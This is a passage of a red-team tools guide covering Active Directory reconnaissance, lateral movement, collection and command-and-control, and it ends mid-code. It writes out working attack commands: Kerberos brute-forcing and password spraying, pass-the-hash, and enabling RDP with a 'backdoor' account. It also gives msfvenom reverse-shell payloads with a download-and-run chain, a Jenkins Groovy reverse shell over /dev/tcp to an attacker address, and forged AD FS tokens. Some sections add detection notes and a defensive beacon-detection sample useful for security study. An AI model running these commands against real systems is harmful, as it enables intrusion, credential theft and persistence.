output.txt\n\n# Return 4624 logon events for the last 30 days\nSeatbelt.exe \"LogonEvents 30\"\n\n# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*\nSeatbelt.exe \"reg \\\"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\" 3 .*defini.* true\"\n\n# Run remote-focused checks against a remote system\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\\sam -password=\"yum \\\"po-ta-toes\\\"\"\n```\n\nFull command groups and parameters can be found 
[here](https://github.com/GhostPack/Seatbelt#command-groups).\n\n![image](https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png)\n\n*Image used from https://exord66.github.io/csharp-in-memory-assemblies*\n\n### [🔙](#tool-list)[ADRecon](https://github.com/sense-of-security/adrecon)\n\nGreat tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.\n\nIt can be run from any workstation that is connected to the environment, even hosts that are not domain members.\n\n[BlackHat USA 2018 SlideDeck](https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation)\n\n**Prerequisites:** \n\n- .NET Framework 3.0 or later (Windows 7 includes 3.0)\n- PowerShell 2.0 or later (Windows 7 includes 2.0)\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/sense-of-security/ADRecon.git\n```\n\n**Install: (Download)** \n\nYou can download a zip archive of the [latest release](https://github.com/sense-of-security/ADRecon/archive/master.zip). \n\n**Usage:** \n\n```bash\n# To run ADRecon on a domain member host.\nPS C:\\\u003e .\\ADRecon.ps1\n\n# To run ADRecon on a domain member host as a different user.\nPS C:\\\u003e .\\ADRecon.ps1 -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e\n\n# To run ADRecon on a non-member host using LDAP.\nPS C:\\\u003e .\\ADRecon.ps1 -Protocol LDAP -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e\n\n# To run ADRecon with specific modules on a non-member host with RSAT. 
(Default OutputType is STDOUT with -Collect parameter)\nPS C:\\\u003e .\\ADRecon.ps1 -Protocol ADWS -DomainController \u003cIP or FQDN\u003e -Credential \u003cdomain\\username\u003e -Collect Domain, DomainControllers\n```\n\nFull usage and parameter information can be found [here](https://github.com/sense-of-security/adrecon#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png)\n\n*Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/*\n\n### [🔙](#tool-list)[adidnsdump](https://github.com/dirkjanm/adidnsdump)\n\nBy default, any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer. \n\nThis tool enables enumeration and exporting of all DNS records in the zone for reconnaissance of internal networks.\n\n**Install: (Pip)** \n\n```bash\npip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/dirkjanm/adidnsdump\ncd adidnsdump\npip install .\n```\n\n**Note:** *The tool requires `impacket` and `dnspython` to function. 
While the tool works with both Python 2 and 3, Python 3 support requires you to install [impacket from GitHub](https://github.com/CoreSecurity/impacket).*\n\n**Usage:** \n\n```bash\n# Display the zones in the domain where you are currently in\nadidnsdump -u icorp\\\\testuser --print-zones icorp-dc.internal.corp\n\n# Display all zones in the domain\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp\n\n# Resolve all unknown records (-r)\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp -r\n```\n\n[Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)\n\n![adidnsdump](https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg)\n\n*Image used from https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/*\n\n### [🔙](#tool-list)[kerbrute](https://github.com/ropnop/kerbrute)\n\nA tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.\n\n**Install: (Go)** \n\n```bash\ngo get github.com/ropnop/kerbrute\n```\n\n**Install: (Make)** \n\n```bash\ngit clone https://github.com/ropnop/kerbrute\ncd kerbrute\nmake all\n```\n\n**Usage:** \n\n```bash\n# User Enumeration\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n# Password Spray\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n# Brute User\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman\n\n# Brute Force (the trailing \"-\" reads username:password combos from stdin)\n./kerbrute -d lab.ropnop.com bruteforce -\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png)\n\n*Image used from https://matthewomccorkle.github.io/day_032_kerbrute/*\n\n### [🔙](#tool-list)[scavenger](https://github.com/SpiderLabs/scavenger)\n\nScavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, 
finding the most frequently used files and folders as well as \"interesting\" files containing sensitive information.\n\nScavenger confronts a challenging issue typically faced by penetration testing consultants during internal penetration tests: having too much access to too many systems with limited days for testing.\n\n**Install:** \n\nFirst install CrackMapExec from [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation).\n\n```bash\ngit clone https://github.com/SpiderLabs/scavenger\ncd scavenger\n```\n\n**Usage:** \n\n```bash\n# Search for interesting files on victim endpoint\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\n```\n\nNice [blog post](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/).\n\n![image](https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png)\n\n*Image used from https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/*\n\nLateral Movement\n====================\n\n### [🔙](#tool-list)[crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec)\n\nThis is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). 
It also offers other features, including enumerating logged-on users, spidering SMB shares, executing psexec-style attacks, auto-injecting Mimikatz/shellcode/DLLs into memory using PowerShell, dumping the NTDS.dit and more.\n\n**Install:** \n\n```bash\nsudo apt install crackmapexec\n```\n\n**Usage:** \n\n```bash\n# Try every user/password combination from the two lists against the host (add --no-bruteforce to pair them line by line instead)\ncrackmapexec smb \u003cip address\u003e -d \u003cdomain\u003e -u \u003cuser list\u003e -p \u003cpassword list\u003e\n\n# Pass-the-hash: authenticate with an NT hash instead of a password\ncrackmapexec smb \u003cip address\u003e -d \u003cdomain\u003e -u \u003cuser\u003e -H \u003cNT hash\u003e\n```\n\nA `(Pwn3d!)` marker after a host means the credential has local administrator rights there. Spraying lists counts against the domain lockout policy, so check it (`net accounts /domain` on a joined host) before trying a second password.\n\n![image](https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png)\n\n### [🔙](#tool-list)[WMIOps](https://github.com/FortyNorthSecurity/WMIOps)\n\nWMIOps is a PowerShell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.\n\nDeveloped by [@christruncer](https://twitter.com/christruncer).\n\nOriginal [blog post](https://www.christophertruncer.com/introducing-wmi-ops/) documenting the release.\n\n**Install: (PowerShell)** \n\n```powershell\ngit clone https://github.com/FortyNorthSecurity/WMIOps\nImport-Module .\\WMIOps\\WMIOps.ps1\n```\n\n**Usage:** \n\n```powershell\n# Executes a user-specified command on the target machine\nInvoke-ExecCommandWMI\n\n# Returns all running processes from the target machine\nGet-RunningProcessesWMI\n\n# Checks whether a user is active at the desktop on the target machine (or away from it)\nFind-ActiveUsersWMI\n\n# Lists all local and network-connected drives on the target system\nGet-SystemDrivesWMI\n\n# Executes a PowerShell script in memory on the target host via WMI and returns the output\nInvoke-RemoteScriptWithOutput\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png)\n\n![image](https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png)\n\n*Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/*\n\n### 
[🔙](#tool-list)[PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell)\n\nTool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.\n\n**Install:** \n\n```bash\ngit clone https://github.com/Mr-Un1k0d3r/PowerLessShell\ncd PowerLessShell\n```\n\n**Usage:** \n\n```bash\n# Help\npython PowerLessShell.py -h\n\n# Generate PowerShell payload \npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n# Generating a shellcode payload\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\n```\n\nFull usage information can be found [here](https://github.com/Mr-Un1k0d3r/PowerLessShell#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png)\n\n*Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628*\n\n### [🔙](#tool-list)[PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec)\n\nPsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.\n\nIt is great for remotely executing commands on target machines.\n\n**Note:** Some AVs detect PsExec as a 'remote admin' virus.\n\n**Install: (PowerShell)** \n\n```bash\nInvoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'\nExpand-Archive -Path 'pstools.zip' -DestinationPath \"$env:TEMP\\pstools\"\nMove-Item -Path \"$env:TEMP\\pstools\\psexec.exe\" .\nRemove-Item -Path \"$env:TEMP\\pstools\" -Recurse\n```\n\n**Usage:** \n\n```bash\n# Prevent the license agreement from being displayed\npsexec.exe /accepteula\n\n# Run the 'hostname' command on remote machine\npsexec.exe \\\\REMOTECOMPUTER hostname\n\n# Run the 'hostname' command on EVERYTHING (on the domain)\npsexec.exe \\\\* hostname\n\n# Run a local executable on a remote machine\npsexec.exe \\\\REMOTECOMPUTER 
-c C:\\Tools\\program.exe\n\n# Run the 'hostname' command with different credentials\npsexec.exe \\\\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word\n\n# Spawn a shell running as SYSTEM (-s) on the remote machine\npsexec.exe -s \\\\REMOTECOMPUTER cmd\n```\n\nPsExec needs administrative access to the target's ADMIN$ share: it copies its service binary (PSEXESVC) there and installs a temporary service, which is exactly the artefact that EDR rules and System event 7045 (service installed) detections key on.\n\nGreat [blog post](https://adamtheautomator.com/psexec/) on PsExec usage.\n\n![image](https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png)\n\n*Image used from https://adamtheautomator.com/psexec/*\n\n### [🔙](#tool-list)[LiquidSnake](https://github.com/RiccardoAncarani/LiquidSnake)\n\nLiquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.\n\nThe tool relies on a WMI event subscription to execute a .NET assembly in memory. That assembly listens for shellcode on a named pipe and then executes it using a variation of thread-hijacking shellcode injection.\n\nThe project is composed of two separate solutions:\n\n- `CSharpNamedPipeLoader` - the component that is transformed into VBS via GadgetToJScript\n- `LiquidSnake` - the component responsible for creating the WMI event subscription on the remote system\n\n**Install:** \n\nOpen both solutions in Visual Studio and build. *Make sure to target the x64 architecture for `CSharpNamedPipeLoader`.*\n\nOutput: two separate EXEs, `CSharpNamedPipeLoader.exe` and `LiquidSnake.exe`.\n\nFull build information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#building).\n\n**Usage:** \n\nUse `LiquidSnake.exe` against a host over which you have administrative access, as follows:\n\n```bash\nLiquidSnake.exe \u003chost\u003e [\u003cusername\u003e \u003cpassword\u003e \u003cdomain\u003e]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\n```\n\nIf everything went fine, you should obtain output similar to the following:\n\n```bash\n[*] Event filter created.\n[*] Event consumer created.\n[*] Subscription created, now sleeping\n[*] Sending some DCOM love..\n[*] Sleeping again... long day\n```\n\nGeneral usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#usage).\n\nFull `LiquidSnake` usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake).\n\n![LiquidSnake](https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg)\n\n*Image used from https://github.com/RiccardoAncarani/LiquidSnake#usage*\n\n### [🔙](#tool-list)Enabling RDP\n\nAll three commands need local administrator rights on the host.\n\n```shell\n# Allow incoming Remote Desktop connections (fDenyTSConnections = 0)\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n# Open TCP 3389 in Windows Firewall\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\n# Grant an existing local account RDP logon rights\nnet localgroup \"Remote Desktop Users\" \"backdoor\" /add\n```\n\n### [🔙](#tool-list)Upgrading shell to meterpreter\n\nReverse shell payload reference: https://infinitelogins.com/tag/payloads/\n\nAfter getting a basic shell on an endpoint, a Meterpreter session is nicer to continue with (pivoting, file transfer, in-memory modules).\n\n**[attacker]** Generate a Meterpreter payload (a 32-bit Windows EXE here; the listener's payload must match) or, for a Linux target, a staged reverse shell:\n\n```shell\nmsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cIP\u003e LPORT=\u003cPORT\u003e -f elf \u003e shell-x86.elf\n```\n\n![image](https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png)\n\n**[attacker]** Serve the file (port 8000 matches the download URL below):\n\n```shell\npython3 -m http.server 8000\n```\n\n**[victim]** Download to the victim endpoint: \n\n```shell\npowershell \"(New-Object System.Net.WebClient).Downloadfile('http://\u003cip\u003e:8000/shell-name.exe','shell-name.exe')\"\n```\n\n**[attacker]** Configure the listener (in msfconsole): \n\n```shell\nuse exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST your-ip\nset LPORT listening-port\nrun\n```\n\n**[victim]** Execute the payload:\n\n```shell\nStart-Process \"shell-name.exe\"\n```\n\n![image](https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png)\n\n### [🔙](#tool-list)Forwarding Ports\n\nAfter gaining access to an endpoint you will often find services bound only to localhost (a database, an admin web UI). Exposing such an internal port on an external interface lets you reach the service from your own host and use it for lateral movement.\n\n```bash\n# Expose local port 80 on external port 8888; fork handles each connection in its own process\nsocat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u0026\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u0026\n```\n\nThe forwarded port is open to anyone who can reach the host, not just you, so remove it when done (`pkill socat`).\n\n### [🔙](#tool-list)Jenkins reverse shell\n\nIf you gain access to a Jenkins script console (`/script`) you can use this Groovy snippet to gain a reverse shell on the node; it runs with the privileges of the Jenkins process, on the controller unless the console is pointed at an agent.\n\n```groovy\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/IP_ADDRESS/PORT;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n```\n\n### [🔙](#tool-list)[ADFSpoof](https://github.com/mandiant/ADFSpoof)\n\nCreated by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.\n\nADFSpoof has two main functions:\n\n1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.\n2. 
Given a signing key, produce a signed security token that can be used to access a federated application.\n\nThis tool is meant to be used in conjunction with [ADFSDump](https://github.com/mandiant/ADFSDump). ADFSDump runs on an AD FS server and outputs the information (EncryptedPFX, DKM key, relying-party settings) that you will need to use ADFSpoof. Reading the DKM key out of Active Directory requires the AD FS service account or Domain Admin-level access.\n\n**Install:** \n\n**Note:** *ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available [here](https://github.com/dmb2168/cryptography).*\n\n```bash\ngit clone https://github.com/mandiant/ADFSpoof\ncd ADFSpoof\npip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n# Decrypt the EncryptedPFX with the DKM key and write the token-signing key/cert to disk\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n# Generate a security token for Office 365 (-s is the AD FS server name, used as the token issuer)\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759}\n```\n\nA forged token is accepted by the relying party for as long as the token-signing certificate is valid, so the only remediation after a signing-key compromise is rotating that certificate.\n\nFull usage information can be found [here](https://github.com/mandiant/ADFSpoof#usage).\n\nAdditional command examples can be found [here](https://github.com/mandiant/ADFSpoof#examples).\n\n![image](https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png)\n\n*Image used from https://github.com/mandiant/ADFSpoof#usage*\n\n### [🔙](#tool-list)[Coercer](https://github.com/p0dalirius/Coercer)\n\nA Python script to automatically coerce a Windows server to authenticate to an arbitrary machine through many methods (MS-RPRN, MS-EFSR, MS-FSRVP, MS-DFSNM and other RPC interfaces that accept a UNC path).\n\nFeatures:\n\n- Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)\n- Tries to connect to a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)\n- Calls one by one all the vulnerable RPC functions to coerce the server to authenticate to an arbitrary machine\n- Random UNC path generation to avoid caching of failed attempts (all modes)\n- Configurable delay between attempts with --delay\n\nMore feature information 
[here](https://github.com/p0dalirius/Coercer#features).\n\n**Install: (pip)** \n\n```bash\nsudo python3 -m pip install coercer\n```\n\n**Usage:** \n\nInstalled via pip the entry point is `coercer`; from a git checkout run `./Coercer.py` instead.\n\n```bash\n# Scan mode (assess the Remote Procedure Calls listening on a machine)\ncoercer scan -t 192.168.1.1 -u 'username' -p 'password' -d test.local -v\n\n# Coerce mode (exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelayx or Responder listening on -l)\ncoercer coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.local -v\n\n# Fuzz mode (fuzz Remote Procedure Calls listening on a machine)\ncoercer fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.local -v\n```\n\nStart the relay (for example `ntlmrelayx.py -t ldaps://dc01 --delegate-access`) on the `-l` host before coercing: the target's machine account authenticates there, and that NTLM authentication cannot be relayed back to the host it came from, nor to a service that enforces signing or channel binding.\n\n![image](https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png)\n\n*Image used from https://github.com/p0dalirius/Coercer#quick-start*\n\nCollection\n====================\n\n### [🔙](#tool-list)[BloodHound](https://github.com/BloodHoundAD/BloodHound)\n\nAn application used to visualise Active Directory environments. A quick way to visualise attack paths and understand victims' Active Directory properties. Data is gathered with a collector (SharpHound on Windows, bloodhound-python from Linux) and imported into the BloodHound GUI, which stores it in Neo4j.\n\n**Install:** [PenTestPartners Walkthrough](https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/)\n\n**Custom Queries:** [CompassSecurity BloodHoundQueries](https://github.com/CompassSecurity/BloodHoundQueries) \n\n![image](https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png)\n\n### [🔙](#tool-list)[Snaffler](https://github.com/SnaffCon/Snaffler)\n\nSnaffler is an advanced credential scanner/collector for Active Directory environments. *With a great [README](https://github.com/SnaffCon/Snaffler/blob/master/README.md)*.\n\nSnaffler uses a system of \"classifiers\", each of which examines shares, folders, files or file contents, passing some items downstream to the next classifier and discarding others. 
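A minimal model of that classifier chain, added here as an illustration and not Snaffler's own code: the three stages (extension, file name, file contents), the Snaffle/Discard/Relay actions and the Black/Red triage colours follow Snaffler's rule vocabulary, but the rule set, the share listing (forward-slash UNC paths so the sample runs on any platform) and the file contents are constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed rule set, loosely modelled on Snaffler's: each rule belongs to one
# stage ("ext", "name" or "content"), matches either a set of values or a regex,
# and carries an action. Snaffle = report the item with a triage colour,
# Discard = stop looking at it, Relay = hand it to the next stage.
RULES = [
    {"name": "DiscardBinaries", "stage": "ext", "values": {".dll", ".exe", ".msi", ".png"},
     "action": "Discard", "triage": None},
    {"name": "KeePassDB", "stage": "ext", "values": {".kdbx", ".kdb"},
     "action": "Snaffle", "triage": "Black"},
    {"name": "ConfigRelay", "stage": "ext",
     "values": {".config", ".xml", ".ini", ".txt", ".ps1", ".yml"},
     "action": "Relay", "triage": None},
    {"name": "PrivateKeyName", "stage": "name",
     "pattern": r"(?i)^id_(rsa|dsa|ecdsa|ed25519)$|\.(pem|ppk)$",
     "action": "Snaffle", "triage": "Black"},
    {"name": "ConnStringPassword", "stage": "content",
     "pattern": r"(?i)(password|pwd)\s*=\s*[^;\s\x22\x27]{4,}",
     "action": "Snaffle", "triage": "Red"},
    {"name": "AwsAccessKey", "stage": "content", "pattern": r"AKIA[0-9A-Z]{16}",
     "action": "Snaffle", "triage": "Red"},
]

# Constructed share listing, the shape a share walk might return. The AKIA value
# is the AWS documentation example key, not a live credential.
SAMPLE_ENTRIES = [
    {"path": "//fs01/it/vault.kdbx", "size": 65536, "content": ""},
    {"path": "//fs01/it/setup.exe", "size": 4_000_000, "content": ""},
    {"path": "//fs01/web/web.config", "size": 812,
     "content": '<add name="db" connectionString="Server=sql01;User Id=app;Password=S3cretPass!" />'},
    {"path": "//fs01/home/bob/.ssh/id_rsa", "size": 2602,
     "content": "-----BEGIN OPENSSH PRIVATE KEY-----"},
    {"path": "//fs01/docs/readme.txt", "size": 20, "content": "Nothing to see here."},
    {"path": "//fs01/docs/notes.txt", "size": 44,
     "content": "old aws key AKIAIOSFODNN7EXAMPLE do not use"},
]


def _matches(rule, subject):
    if "values" in rule:
        return subject in rule["values"]
    return re.search(rule["pattern"], subject) is not None


def classify(entry, rules=RULES, max_content_bytes=1_000_000):
    """Run one listing entry through the ext -> name -> content stages.

    Returns (triage, rule_name) for a finding, or None when the entry was
    discarded or nothing matched. The content stage is only entered for
    entries an earlier stage explicitly relayed, and only if they are small
    enough to be worth pulling over the wire.
    """
    path = PureWindowsPath(entry["path"])
    relayed = False
    for stage in ("ext", "name", "content"):
        if stage == "ext":
            subject = path.suffix.lower()
        elif stage == "name":
            subject = path.name
        else:
            if not relayed or entry["size"] > max_content_bytes:
                return None
            subject = entry.get("content", "")
        for rule in rules:
            if rule["stage"] != stage or not _matches(rule, subject):
                continue
            if rule["action"] == "Discard":
                return None
            if rule["action"] == "Snaffle":
                return (rule["triage"], rule["name"])
            relayed = True   # Relay: hand the item to the next stage
            break            # first matching rule in a stage wins
    return None


def snaffle(entries, rules=RULES):
    """Classify a whole listing; findings sorted by triage colour, Black first."""
    order = {"Black": 0, "Red": 1, "Yellow": 2, "Green": 3}
    findings = []
    for entry in entries:
        hit = classify(entry, rules)
        if hit:
            findings.append((hit[0], hit[1], entry["path"]))
    return sorted(findings, key=lambda f: (order[f[0]], f[2]))


if __name__ == "__main__":
    for triage, rule, path in snaffle(SAMPLE_ENTRIES):
        print(f"[{triage}] {rule:20} {path}")
```

The size gate on the content stage is the part that matters operationally: reading every relayed file across hundreds of shares is what turns a quiet scan into a noisy one, so the real tool bounds it the same way.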
Each classifier uses a set of rules to decide what to do with the items it classifies.\n\n*More information about Snaffler [rules](https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset).*\n\n'*Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.*' - Snaffler README (2023)\n\n**Install:** \n\nYou can download the binary from the [GitHub Releases Page](https://github.com/SnaffCon/Snaffler/releases).\n\n**Usage:** \n\n```bash\n# Targeted local scan of one directory (-i) with results on stdout (-s); no AD or share enumeration, so less likely to trigger detections\nSnaffler.exe -s -i C:\\\n\n# Go in loud: enumerate computers from AD, find their shares and scan everything readable, logging to a file (-o)\nsnaffler.exe -s -o snaffler.log\n```\n\nThe loud mode touches every reachable share, which shows up as one account opening files across the whole estate; honeyfile and file-share audit alerts are the usual consequence.\n\n![image](https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png)\n\n*Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like*\n\n### [🔙](#tool-list)[linWinPwn](https://github.com/lefayjey/linWinPwn)\n\nlinWinPwn is a bash script that automates a number of Active Directory enumeration and vulnerability checks.\n\nThe script uses a number of tools and serves as a wrapper around them. 
Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.\n\nlinWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.\n\n**Install:** \n\n```bash\ngit clone https://github.com/lefayjey/linWinPwn\ncd linWinPwn; chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\n```\n\n**Usage:** \n\n```bash\n# Default: interactive - Open interactive menu to run checks separately\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e [-d \u003cAD_domain\u003e -u \u003cAD_user\u003e -p \u003cAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003e -o \u003coutput_dir\u003e]\n\n# Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e --auto-config\n\n# LDAPS - Use LDAPS instead of LDAP (port 636)\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e --ldaps\n\n# Module pwd_dump: Password Dump\n./linWinPwn.sh -t \u003cDomain_Controller_IP\u003e -M pwd_dump [-d \u003cAD_domain\u003e -u \u003cAD_user\u003e -p \u003cAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003e -o \u003coutput_dir\u003e]\n```\n\nFull usage information [here](https://github.com/lefayjey/linWinPwn#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png)\n\n*Image used from https://github.com/lefayjey/linWinPwn#demos*\n\nCommand and Control\n====================\n\n### [🔙](#tool-list)[Living Off Trusted Sites Project](https://lots-project.com/)\n\nC2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. 
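What that detection looks like in practice, as an added example that is not part of the original page: the proxy log lines below are constructed and the thresholds are assumptions. It flags destinations contacted by a single internal client (the "uncommon domain" check) and, separately, client/destination pairs whose connection intervals are too regular to be a person browsing. The second check still fires when the C2 endpoint is docs.google.com, which is the gap a trusted domain does not close unless the implant also randomises its sleep.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, one connection per line:
# "<ISO timestamp> <client> <destination host> <bytes>".
# 10.0.0.5 runs two fictional implants: one to a made-up domain and one
# hiding behind docs.google.com; the other clients are ordinary users.
SAMPLE_LOG = """\
2024-01-10T09:00:00 10.0.0.5 update.microsoft.com 2048
2024-01-10T09:00:03 10.0.0.7 update.microsoft.com 2048
2024-01-10T09:00:05 10.0.0.9 update.microsoft.com 2048
2024-01-10T09:00:10 10.0.0.5 cdn-edge-7731.example.net 512
2024-01-10T09:01:10 10.0.0.5 cdn-edge-7731.example.net 512
2024-01-10T09:02:10 10.0.0.5 cdn-edge-7731.example.net 512
2024-01-10T09:03:10 10.0.0.5 cdn-edge-7731.example.net 512
2024-01-10T09:04:10 10.0.0.5 cdn-edge-7731.example.net 512
2024-01-10T09:00:20 10.0.0.5 docs.google.com 3000
2024-01-10T09:05:20 10.0.0.5 docs.google.com 3000
2024-01-10T09:10:20 10.0.0.5 docs.google.com 3000
2024-01-10T09:15:20 10.0.0.5 docs.google.com 3000
2024-01-10T09:20:20 10.0.0.5 docs.google.com 3000
2024-01-10T09:01:00 10.0.0.7 docs.google.com 45000
2024-01-10T09:07:30 10.0.0.7 docs.google.com 12000
2024-01-10T09:30:00 10.0.0.9 docs.google.com 8000
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, client, host, bytes) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, nbytes = line.split()
        records.append((datetime.fromisoformat(ts), client, host, int(nbytes)))
    return records


def rare_hosts(records, max_clients=1):
    """Destinations contacted by at most `max_clients` distinct internal clients."""
    clients_per_host = defaultdict(set)
    for _, client, host, _ in records:
        clients_per_host[host].add(client)
    return sorted(h for h, c in clients_per_host.items() if len(c) <= max_clients)


def beacon_candidates(records, min_hits=5, max_cv=0.1):
    """(client, host) pairs whose inter-connection intervals are suspiciously regular.

    cv = stdev/mean of the gaps between connections. A fixed sleep with little
    jitter gives a cv near 0; human browsing gives large, irregular gaps.
    """
    times = defaultdict(list)
    for ts, client, host, _ in records:
        times[(client, host)].append(ts)
    findings = []
    for (client, host), stamps in times.items():
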